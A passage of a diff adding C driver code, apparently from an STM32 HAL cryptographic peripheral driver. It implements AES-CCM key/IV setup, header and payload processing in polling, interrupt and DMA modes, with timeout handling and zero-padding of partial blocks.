Timeout */ + if (Timeout != HAL_MAX_DELAY) + { + if (((HAL_GetTick() - tickstart) > Timeout) || (Timeout == 0U)) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + } + } + + if ((hcryp->Size % 16U) != 0U) + { + /* Compute the number of padding bytes in last block of payload */ + npblb = ((((uint32_t)(hcryp->Size) / 16U) + 1U) * 16U) - (uint32_t)(hcryp->Size); + + /* Number of valid words (lastwordsize) in last block */ + if ((npblb % 4U) == 0U) + { + lastwordsize = (16U - npblb) / 4U; + } + else + { + lastwordsize = ((16U - npblb) / 4U) + 1U; + } + /* Last block optionally pad the data with zeros*/ + for (loopcounter = 0U; loopcounter < lastwordsize; loopcounter ++) + { + /* Write the last input block in the IN FIFO */ + hcryp->Instance->DINR = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + } + while (loopcounter < 4U) + { + /* Pad the data with zeros to have a complete block */ + hcryp->Instance->DINR = 0U; + loopcounter++; + } + /* Wait for CCF flag to be raised */ + if (CRYP_WaitOnCCFlag(hcryp, Timeout) != HAL_OK) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + /* Clear CCF flag */ + __HAL_CRYP_CLEAR_FLAG(hcryp, CRYP_CCF_CLEAR); + + } + } +#endif /* End AES or CRYP */ + +#if defined(CRYP) + + /************************* Header phase *************************************/ + /* Header block(B1) : associated data length expressed in bytes concatenated + with Associated Data (A)*/ + + if (CRYP_GCMCCM_SetHeaderPhase(hcryp, Timeout) != HAL_OK) + { + return HAL_ERROR; + } + + /********************** Payload phase ***************************************/ + + /* Set the phase */ + hcryp->Phase = CRYP_PHASE_PROCESS; + + /* Disable the CRYP peripheral */ + __HAL_CRYP_DISABLE(hcryp); + + /* Select payload phase once the header phase is performed */ + CRYP_SET_PHASE(hcryp, CRYP_PHASE_PAYLOAD); + + /* Enable the CRYP peripheral */ + __HAL_CRYP_ENABLE(hcryp); + + } /* if (DoKeyIVConfig == 1U) */ + + if ((hcryp->Size % 16U) != 0U) + { + /* recalculate wordsize */ + wordsize = ((wordsize / 4U) * 4U) ; + } + /* Get tick */ + tickstart = HAL_GetTick(); + /*Temporary CrypOutCount Value*/ + outcount = hcryp->CrypOutCount; + + /* Write input data and get output data */ + while ((hcryp->CrypInCount < wordsize) && (outcount < wordsize)) + { + /* Write plain data and get cipher data */ + CRYP_AES_ProcessData(hcryp, Timeout); + + /* Check for the Timeout */ + if (Timeout != HAL_MAX_DELAY) + { + if (((HAL_GetTick() - tickstart) > Timeout) || (Timeout == 0U)) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + } + } + + if ((hcryp->Size % 16U) != 0U) + { + /* CRYP Workaround : CRYP1 generates correct TAG during CCM decryption only when ciphertext blocks size is multiple of + 128 bits. If lthe size of the last block of payload is inferior to 128 bits, when CCM decryption + is selected, then the TAG message will be wrong.*/ + CRYP_Workaround(hcryp, Timeout); + } +#endif /* CRYP */ + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief AES CCM encryption/decryption process in interrupt mode + * for TinyAES IP, no encrypt/decrypt performed, only authentication preparation. + * @param hcryp: pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for CRYP module + * @retval HAL status + */ +static HAL_StatusTypeDef CRYP_AESCCM_Process_IT(CRYP_HandleTypeDef *hcryp) +{ + uint32_t DoKeyIVConfig = 1U; /* By default, carry out peripheral Key and IV configuration */ +#if defined(CRYP) + __IO uint32_t count = 0U; +#endif /* CRYP */ + + if (hcryp->Init.KeyIVConfigSkip == CRYP_KEYIVCONFIG_ONCE) + { + if (hcryp->KeyIVConfig == 1U) + { + /* If the Key and IV configuration has to be done only once + and if it has already been done, skip it */ + DoKeyIVConfig = 0U; + hcryp->SizesSum += hcryp->Size; /* Compute message total payload length */ + } + else + { + /* If the Key and IV configuration has to be done only once + and if it has not been done already, do it and set KeyIVConfig + to keep track it won't have to be done again next time */ + hcryp->KeyIVConfig = 1U; + hcryp->SizesSum = hcryp->Size; /* Merely store payload length */ + } + } + else + { + hcryp->SizesSum = hcryp->Size; + } + + /* Configure Key, IV and process message (header and payload) */ + if (DoKeyIVConfig == 1U) + { + /* Reset CrypHeaderCount */ + hcryp->CrypHeaderCount = 0U; + +#if defined(CRYP) + + /************ Init phase ************/ + + CRYP_SET_PHASE(hcryp, CRYP_PHASE_INIT); + + /* Set the key */ + CRYP_SetKey(hcryp, hcryp->Init.KeySize); + + /* Set the initialization vector (IV) with CTR1 information */ + hcryp->Instance->IV0LR = (hcryp->Init.B0[0]) & CRYP_CCM_CTR1_0; + hcryp->Instance->IV0RR = hcryp->Init.B0[1]; + hcryp->Instance->IV1LR = hcryp->Init.B0[2]; + hcryp->Instance->IV1RR = (hcryp->Init.B0[3] & CRYP_CCM_CTR1_1) | CRYP_CCM_CTR1_2; + + /* Enable the CRYP peripheral */ + __HAL_CRYP_ENABLE(hcryp); + + /*Write the B0 packet into CRYP_DIN Register*/ + if (hcryp->Init.DataType == CRYP_DATATYPE_8B) + { + hcryp->Instance->DIN = __REV(*(uint32_t *)(hcryp->Init.B0)); + hcryp->Instance->DIN = __REV(*(uint32_t *)(hcryp->Init.B0 + 1)); + hcryp->Instance->DIN = __REV(*(uint32_t *)(hcryp->Init.B0 + 2)); + hcryp->Instance->DIN = __REV(*(uint32_t *)(hcryp->Init.B0 + 3)); + } + else if (hcryp->Init.DataType == CRYP_DATATYPE_16B) + { + hcryp->Instance->DIN = __ROR(*(uint32_t *)(hcryp->Init.B0), 16); + hcryp->Instance->DIN = __ROR(*(uint32_t *)(hcryp->Init.B0 + 1), 16); + hcryp->Instance->DIN = __ROR(*(uint32_t *)(hcryp->Init.B0 + 2), 16); + hcryp->Instance->DIN = __ROR(*(uint32_t *)(hcryp->Init.B0 + 3), 16); + } + else if (hcryp->Init.DataType == CRYP_DATATYPE_1B) + { + hcryp->Instance->DIN = __RBIT(*(uint32_t *)(hcryp->Init.B0)); + hcryp->Instance->DIN = __RBIT(*(uint32_t *)(hcryp->Init.B0 + 1)); + hcryp->Instance->DIN = __RBIT(*(uint32_t *)(hcryp->Init.B0 + 2)); + hcryp->Instance->DIN = __RBIT(*(uint32_t *)(hcryp->Init.B0 + 3)); + } + else + { + hcryp->Instance->DIN = *(uint32_t *)(hcryp->Init.B0); + hcryp->Instance->DIN = *(uint32_t *)(hcryp->Init.B0 + 1); + hcryp->Instance->DIN = *(uint32_t *)(hcryp->Init.B0 + 2); + hcryp->Instance->DIN = *(uint32_t *)(hcryp->Init.B0 + 3); + } + /*Wait for the CRYPEN bit to be cleared*/ + count = CRYP_TIMEOUT_GCMCCMINITPHASE; + do + { + count-- ; + if (count == 0U) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + } while ((hcryp->Instance->CR & CRYP_CR_CRYPEN) == CRYP_CR_CRYPEN); + + /* Select header phase */ + CRYP_SET_PHASE(hcryp, CRYP_PHASE_HEADER); + + } /* end of if (DoKeyIVConfig == 1U) */ + + /* Enable interrupts */ + __HAL_CRYP_ENABLE_IT(hcryp, CRYP_IT_INI); + + /* Enable CRYP */ + __HAL_CRYP_ENABLE(hcryp); + +#else /* AES */ + + /*AES2v1.1.1 : CCM authentication : no init phase, only header and final phase */ + /* Select header phase */ + CRYP_SET_PHASE(hcryp, CRYP_PHASE_HEADER); + + /* configured mode and encryption mode */ + MODIFY_REG(hcryp->Instance->CR, AES_CR_MODE, CRYP_OPERATINGMODE_ENCRYPT); + + /* Set the key */ + CRYP_SetKey(hcryp, hcryp->Init.KeySize); + + /* Set the initialization vector with zero values*/ + hcryp->Instance->IVR3 = 0U; + hcryp->Instance->IVR2 = 0U; + hcryp->Instance->IVR1 = 0U; + hcryp->Instance->IVR0 = 0U; + + /* Enable interrupts */ + __HAL_CRYP_ENABLE_IT(hcryp, CRYP_IT_CCFIE | CRYP_IT_ERRIE); + /* Enable the CRYP peripheral */ + __HAL_CRYP_ENABLE(hcryp); + + /*Write the B0 packet into CRYP_DIN*/ + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.B0); + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.B0 + 1); + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.B0 + 2); + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.B0 + 3); + + } /* end of if (DoKeyIVConfig == 1U) */ +#endif /* End AES or CRYP */ + + /* Return function status */ + return HAL_OK; +} +/** + * @brief AES CCM encryption/decryption process in DMA mode + * for TinyAES IP, no encrypt/decrypt performed, only authentication preparation. + * @param hcryp: pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for CRYP module + * @retval HAL status + */ +static HAL_StatusTypeDef CRYP_AESCCM_Process_DMA(CRYP_HandleTypeDef *hcryp) +{ + uint32_t wordsize; + __IO uint32_t count = 0U; + uint32_t DoKeyIVConfig = 1U; /* By default, carry out peripheral Key and IV configuration */ +#if defined(AES) + uint32_t loopcounter; + uint32_t npblb; + uint32_t lastwordsize; +#endif + + if (hcryp->Init.KeyIVConfigSkip == CRYP_KEYIVCONFIG_ONCE) + { + if (hcryp->KeyIVConfig == 1U) + { + /* If the Key and IV configuration has to be done only once + and if it has already been done, skip it */ + DoKeyIVConfig = 0U; + hcryp->SizesSum += hcryp->Size; /* Compute message total payload length */ + } + else + { + /* If the Key and IV configuration has to be done only once + and if it has not been done already, do it and set KeyIVConfig + to keep track it won't have to be done again next time */ + hcryp->KeyIVConfig = 1U; + hcryp->SizesSum = hcryp->Size; /* Merely store payload length */ + } + } + else + { + hcryp->SizesSum = hcryp->Size; + } + + if (DoKeyIVConfig == 1U) + { + + /* Reset CrypHeaderCount */ + hcryp->CrypHeaderCount = 0U; + +#if defined(CRYP) + + /************************** Init phase **************************************/ + + CRYP_SET_PHASE(hcryp, CRYP_PHASE_INIT); + + /* Set the key */ + CRYP_SetKey(hcryp, hcryp->Init.KeySize); + + /* Set the initialization vector (IV) with CTR1 information */ + hcryp->Instance->IV0LR = (hcryp->Init.B0[0]) & CRYP_CCM_CTR1_0; + hcryp->Instance->IV0RR = hcryp->Init.B0[1]; + hcryp->Instance->IV1LR = hcryp->Init.B0[2]; + hcryp->Instance->IV1RR = (hcryp->Init.B0[3] & CRYP_CCM_CTR1_1) | CRYP_CCM_CTR1_2; + + /* Enable the CRYP peripheral */ + __HAL_CRYP_ENABLE(hcryp); + + /*Write the B0 packet into CRYP_DIN Register*/ + if (hcryp->Init.DataType == CRYP_DATATYPE_8B) + { + hcryp->Instance->DIN = __REV(*(uint32_t *)(hcryp->Init.B0)); + hcryp->Instance->DIN = __REV(*(uint32_t *)(hcryp->Init.B0 + 1)); + hcryp->Instance->DIN = __REV(*(uint32_t *)(hcryp->Init.B0 + 2)); + hcryp->Instance->DIN = __REV(*(uint32_t *)(hcryp->Init.B0 + 3)); + } + else if (hcryp->Init.DataType == CRYP_DATATYPE_16B) + { + hcryp->Instance->DIN = __ROR(*(uint32_t *)(hcryp->Init.B0), 16); + hcryp->Instance->DIN = __ROR(*(uint32_t *)(hcryp->Init.B0 + 1), 16); + hcryp->Instance->DIN = __ROR(*(uint32_t *)(hcryp->Init.B0 + 2), 16); + hcryp->Instance->DIN = __ROR(*(uint32_t *)(hcryp->Init.B0 + 3), 16); + } + else if (hcryp->Init.DataType == CRYP_DATATYPE_1B) + { + hcryp->Instance->DIN = __RBIT(*(uint32_t *)(hcryp->Init.B0)); + hcryp->Instance->DIN = __RBIT(*(uint32_t *)(hcryp->Init.B0 + 1)); + hcryp->Instance->DIN = __RBIT(*(uint32_t *)(hcryp->Init.B0 + 2)); + hcryp->Instance->DIN = __RBIT(*(uint32_t *)(hcryp->Init.B0 + 3)); + } + else + { + hcryp->Instance->DIN = *(uint32_t *)(hcryp->Init.B0); + hcryp->Instance->DIN = *(uint32_t *)(hcryp->Init.B0 + 1); + hcryp->Instance->DIN = *(uint32_t *)(hcryp->Init.B0 + 2); + hcryp->Instance->DIN = *(uint32_t *)(hcryp->Init.B0 + 3); + } + + /*Wait for the CRYPEN bit to be cleared*/ + count = CRYP_TIMEOUT_GCMCCMINITPHASE; + do + { + count-- ; + if (count == 0U) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + } while ((hcryp->Instance->CR & CRYP_CR_CRYPEN) == CRYP_CR_CRYPEN); + +#else /* AES */ + + /*AES2v1.1.1 : CCM authentication : no init phase, only header and final phase */ + /* Select header phase */ + CRYP_SET_PHASE(hcryp, CRYP_PHASE_HEADER); + + /* configured encryption mode */ + MODIFY_REG(hcryp->Instance->CR, AES_CR_MODE, CRYP_OPERATINGMODE_ENCRYPT); + + /* Set the key */ + CRYP_SetKey(hcryp, hcryp->Init.KeySize); + + /* Set the initialization vector with zero values*/ + hcryp->Instance->IVR3 = 0U; + hcryp->Instance->IVR2 = 0U; + hcryp->Instance->IVR1 = 0U; + hcryp->Instance->IVR0 = 0U; + + /* Enable the CRYP peripheral */ + __HAL_CRYP_ENABLE(hcryp); + + /*Write the B0 packet into CRYP_DIN*/ + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.B0); + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.B0 + 1); + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.B0 + 2); + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.B0 + 3); + + count = CRYP_TIMEOUT_GCMCCMINITPHASE; + do + { + count-- ; + if (count == 0U) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + } while (HAL_IS_BIT_CLR(hcryp->Instance->SR, AES_SR_CCF)); + /* Clear CCF flag */ + __HAL_CRYP_CLEAR_FLAG(hcryp, CRYP_CCF_CLEAR); + + /* Set the phase */ + hcryp->Phase = CRYP_PHASE_PROCESS; + + /* From that point the whole message must be processed, first the Header then the payload. + First the Header block(B1) : associated data length expressed in bytes concatenated with Associated Data (A)*/ + + if (hcryp->Init.HeaderSize != 0U) + { + if ((hcryp->Init.HeaderSize % 4U) == 0U) + { + /* HeaderSize %4, no padding */ + for (loopcounter = 0U; (loopcounter < hcryp->Init.HeaderSize); loopcounter += 4U) + { + /* Write the Input block in the Data Input register */ + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + + /* wait until the end of computation */ + count = CRYP_TIMEOUT_GCMCCMINITPHASE; + do + { + count-- ; + if (count == 0U) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + } while (HAL_IS_BIT_CLR(hcryp->Instance->SR, AES_SR_CCF)); + /* Clear CCF flag */ + __HAL_CRYP_CLEAR_FLAG(hcryp, CRYP_CCF_CLEAR); + } + } + else + { + /*Write Header block in the IN FIFO without last block */ + for (loopcounter = 0U; (loopcounter < ((hcryp->Init.HeaderSize) - (hcryp->Init.HeaderSize % 4U))); loopcounter += 4U) + { + /* Write the input block in the data input register */ + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + + count = CRYP_TIMEOUT_GCMCCMINITPHASE; + do + { + count-- ; + if (count == 0U) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + } while (HAL_IS_BIT_CLR(hcryp->Instance->SR, AES_SR_CCF)); + /* Clear CCF flag */ + __HAL_CRYP_CLEAR_FLAG(hcryp, CRYP_CCF_CLEAR); + } + /* Last block optionally pad the data with zeros*/ + for (loopcounter = 0U; (loopcounter < (hcryp->Init.HeaderSize % 4U)); loopcounter++) + { + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + } + while (loopcounter < 4U) + { + /* Pad the data with zeros to have a complete block */ + hcryp->Instance->DINR = 0x0U; + loopcounter++; + } + + count = CRYP_TIMEOUT_GCMCCMINITPHASE; + do + { + count-- ; + if (count == 0U) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + } while (HAL_IS_BIT_CLR(hcryp->Instance->SR, AES_SR_CCF)); + /* Clear CCF flag */ + __HAL_CRYP_CLEAR_FLAG(hcryp, CRYP_CCF_CLEAR); + } + } + } /* if (DoKeyIVConfig == 1U) */ + /* Then the payload: cleartext payload (not the ciphertext payload). + Write input Data, no output Data to get */ + if (hcryp->Size != 0U) + { + if (hcryp->Size >= 16U) + { + if ((hcryp->Size % 16U) == 0U) + { + CRYP_SetDMAConfig(hcryp, (uint32_t)(hcryp->pCrypInBuffPtr), (hcryp->Size / 4U), (uint32_t)(hcryp->pCrypOutBuffPtr)); + } + else /*to compute last word<128bits, otherwise it will not be encrypted/decrypted */ + { + wordsize = (uint32_t)(hcryp->Size) + (16U - ((uint32_t)(hcryp->Size) % 16U)) ; + + /* Set the input and output addresses and start DMA transfer, pCrypOutBuffPtr size should be %4 */ + CRYP_SetDMAConfig(hcryp, (uint32_t)(hcryp->pCrypInBuffPtr), ((uint16_t)wordsize / 4U), + (uint32_t)(hcryp->pCrypOutBuffPtr)); + } + } + if ((hcryp->Size < 16U) != 0U) + { + /* Compute the number of padding bytes in last block of payload */ + npblb = ((((uint32_t)(hcryp->Size) / 16U) + 1U) * 16U) - (uint32_t)(hcryp->Size); + + /* Number of valid words (lastwordsize) in last block */ + if ((npblb % 4U) == 0U) + { + lastwordsize = (16U - npblb) / 4U; + } + else + { + lastwordsize = ((16U - npblb) / 4U) + 1U; + } + /* Last block optionally pad the data with zeros*/ + for (loopcounter = 0U; loopcounter < lastwordsize; loopcounter ++) + { + /* Write the last input block in the IN FIFO */ + hcryp->Instance->DINR = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + } + while (loopcounter < 4U) + { + /* Pad the data with zeros to have a complete block */ + hcryp->Instance->DINR = 0U; + loopcounter++; + } + count = CRYP_TIMEOUT_GCMCCMINITPHASE; + do + { + count-- ; + if (count == 0U) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + } while (HAL_IS_BIT_CLR(hcryp->Instance->SR, AES_SR_CCF)); + /* Clear CCF flag */ + __HAL_CRYP_CLEAR_FLAG(hcryp, CRYP_CCF_CLEAR); + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + + /* Change the CRYP state and phase */ + hcryp->State = HAL_CRYP_STATE_READY; + } + } + else + { + /* Process unLocked */ + __HAL_UNLOCK(hcryp); + + /* Change the CRYP state and phase */ + hcryp->State = HAL_CRYP_STATE_READY; + } +#endif /* AES */ +#if defined(CRYP) + /********************* Header phase *****************************************/ + + if (CRYP_GCMCCM_SetHeaderPhase_DMA(hcryp) != HAL_OK) + { + return HAL_ERROR; + } + + /******************** Payload phase *****************************************/ + + /* Set the phase */ + hcryp->Phase = CRYP_PHASE_PROCESS; + + /* Disable the CRYP peripheral */ + __HAL_CRYP_DISABLE(hcryp); + + /* Select payload phase once the header phase is performed */ + CRYP_SET_PHASE(hcryp, CRYP_PHASE_PAYLOAD); + + } /* if (DoKeyIVConfig == 1U) */ + if (hcryp->Size != 0U) + { + /* Size should be %4 otherwise Tag will be incorrectly generated for GCM Encryption & CCM Decryption + Workaround is implemented in polling mode, so if last block of + payload <128bit don't use HAL_CRYP_AESGCM_DMA otherwise TAG is incorrectly generated for GCM Encryption. */ + /* Set the input and output addresses and start DMA transfer */ + if ((hcryp->Size % 16U) == 0U) + { + CRYP_SetDMAConfig(hcryp, (uint32_t)(hcryp->pCrypInBuffPtr), hcryp->Size / 4U, (uint32_t)(hcryp->pCrypOutBuffPtr)); + } + else + { + wordsize = (uint32_t)(hcryp->Size) + 16U - ((uint32_t)(hcryp->Size) % 16U) ; + + /* Set the input and output addresses and start DMA transfer, pCrypOutBuffPtr size should be %4*/ + CRYP_SetDMAConfig(hcryp, (uint32_t)(hcryp->pCrypInBuffPtr), (uint16_t)wordsize / 4U, + (uint32_t)(hcryp->pCrypOutBuffPtr)); + } + } + else /*Size = 0*/ + { + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + + /* Change the CRYP state and phase */ + hcryp->State = HAL_CRYP_STATE_READY; + } +#endif /* CRYP */ + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Sets the payload phase in iterrupt mode + * @param hcryp: pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for CRYP module + * @retval state + */ +static void CRYP_GCMCCM_SetPayloadPhase_IT(CRYP_HandleTypeDef *hcryp) +{ + uint32_t loopcounter; + uint32_t temp[4]; /* Temporary CrypOutBuff */ + uint32_t lastwordsize; + uint32_t npblb; + uint32_t i; +#if defined(AES) + uint16_t outcount; /* Temporary CrypOutCount Value */ +#endif /* AES */ + + /***************************** Payload phase *******************************/ + +#if defined(CRYP) + if (hcryp->Size == 0U) + { + /* Disable interrupts */ + __HAL_CRYP_DISABLE_IT(hcryp, CRYP_IT_INI | CRYP_IT_OUTI); + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + + /* Change the CRYP state */ + hcryp->State = HAL_CRYP_STATE_READY; + } + + else if (((hcryp->Size / 4U) - (hcryp->CrypInCount)) >= 4U) + { + /* Write the input block in the IN FIFO */ + hcryp->Instance->DIN = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + hcryp->Instance->DIN = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + hcryp->Instance->DIN = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + hcryp->Instance->DIN = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + if (((hcryp->Size / 4U) == hcryp->CrypInCount) && ((hcryp->Size % 16U) == 0U)) + { + /* Disable interrupts */ + __HAL_CRYP_DISABLE_IT(hcryp, CRYP_IT_INI); + + /* Call the input data transfer complete callback */ +#if (USE_HAL_CRYP_REGISTER_CALLBACKS == 1U) + /*Call registered Input complete callback*/ + hcryp->InCpltCallback(hcryp); +#else + /*Call legacy weak Input complete callback*/ + HAL_CRYP_InCpltCallback(hcryp); +#endif /* USE_HAL_CRYP_REGISTER_CALLBACKS */ + } + if (hcryp->CrypOutCount < (hcryp->Size / 4U)) + { + /* Read the output block from the Output FIFO and put them in temporary buffer then get CrypOutBuff from temporary buffer */ + for (i = 0U; i < 4U; i++) + { + temp[i] = hcryp->Instance->DOUT; + } + i = 0U; + while (((hcryp->CrypOutCount < ((hcryp->Size) / 4U))) && (i < 4U)) + { + *(uint32_t *)(hcryp->pCrypOutBuffPtr + hcryp->CrypOutCount) = temp[i]; + hcryp->CrypOutCount++; + i++; + } + if (((hcryp->Size / 4U) == hcryp->CrypOutCount) && ((hcryp->Size % 16U) == 0U)) + { + /* Disable interrupts */ + __HAL_CRYP_DISABLE_IT(hcryp, CRYP_IT_OUTI); + + /* Change the CRYP state */ + hcryp->State = HAL_CRYP_STATE_READY; + + /* Disable CRYP */ + __HAL_CRYP_DISABLE(hcryp); + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + + /* Call output transfer complete callback */ +#if (USE_HAL_CRYP_REGISTER_CALLBACKS == 1) + /*Call registered Output complete callback*/ + hcryp->OutCpltCallback(hcryp); +#else + /*Call legacy weak Output complete callback*/ + HAL_CRYP_OutCpltCallback(hcryp); +#endif /* USE_HAL_CRYP_REGISTER_CALLBACKS */ + } + } + } + else if ((hcryp->Size % 16U) != 0U) + { + /* Size should be %4 in word and %16 in byte otherwise TAG will be incorrectly generated for GCM Encryption & CCM Decryption + Workaround is implemented in polling mode, so if last block of + payload <128bit don't use CRYP_AESGCM_Encrypt_IT otherwise TAG is incorrectly generated. */ + + /* Compute the number of padding bytes in last block of payload */ + npblb = ((((uint32_t)(hcryp->Size) / 16U) + 1U) * 16U) - (uint32_t)(hcryp->Size); + + /* Number of valid words (lastwordsize) in last block */ + if ((npblb % 4U) == 0U) + { + lastwordsize = (16U - npblb) / 4U; + } + else + { + lastwordsize = ((16U - npblb) / 4U) + 1U; + } + + /* Last block optionally pad the data with zeros*/ + for (loopcounter = 0U; loopcounter < lastwordsize; loopcounter++) + { + hcryp->Instance->DIN = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + } + while (loopcounter < 4U) + { + /* Pad the data with zeros to have a complete block */ + hcryp->Instance->DIN = 0x0U; + loopcounter++; + } + __HAL_CRYP_DISABLE_IT(hcryp, CRYP_IT_INI); + + if ((hcryp->Instance->SR & CRYP_FLAG_OFNE) != 0x0U) + { + for (i = 0U; i < 4U; i++) + { + temp[i] = hcryp->Instance->DOUT; + } + if (((hcryp->Size) / 4U) == 0U) + { + for (i = 0U; i < ((uint32_t)(hcryp->Size) % 4U); i++) + { + *(uint32_t *)(hcryp->pCrypOutBuffPtr + hcryp->CrypOutCount) = temp[i]; + hcryp->CrypOutCount++; + } + } + i = 0x0U; + while (((hcryp->CrypOutCount < ((hcryp->Size) / 4U))) && (i < 4U)) + { + *(uint32_t *)(hcryp->pCrypOutBuffPtr + hcryp->CrypOutCount) = temp[i]; + hcryp->CrypOutCount++; + i++; + } + } + if (hcryp->CrypOutCount >= (hcryp->Size / 4U)) + { + /* Disable interrupts */ + __HAL_CRYP_DISABLE_IT(hcryp, CRYP_IT_OUTI | CRYP_IT_INI); + + /* Change the CRYP peripheral state */ + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + + /* Call output transfer complete callback */ +#if (USE_HAL_CRYP_REGISTER_CALLBACKS == 1) + /*Call registered Output complete callback*/ + hcryp->OutCpltCallback(hcryp); +#else + /*Call legacy weak Output complete callback*/ + HAL_CRYP_OutCpltCallback(hcryp); +#endif /* USE_HAL_CRYP_REGISTER_CALLBACKS */ + } + } + else + { + /* Nothing to do */ + } +#else /* AES */ + + /* Read the output block from the output FIFO and put them in temporary buffer then get CrypOutBuff from temporary buffer*/ + for (i = 0U; i < 4U; i++) + { + temp[i] = hcryp->Instance->DOUTR; + } + i = 0U; + while ((hcryp->CrypOutCount < ((hcryp->Size + 3U) / 4U)) && (i < 4U)) + { + *(uint32_t *)(hcryp->pCrypOutBuffPtr + hcryp->CrypOutCount) = temp[i]; + hcryp->CrypOutCount++; + i++; + } + /*Temporary CrypOutCount Value*/ + outcount = hcryp->CrypOutCount; + + if ((hcryp->CrypOutCount >= (hcryp->Size / 4U)) && ((outcount * 4U) >= hcryp->Size)) + { + /* 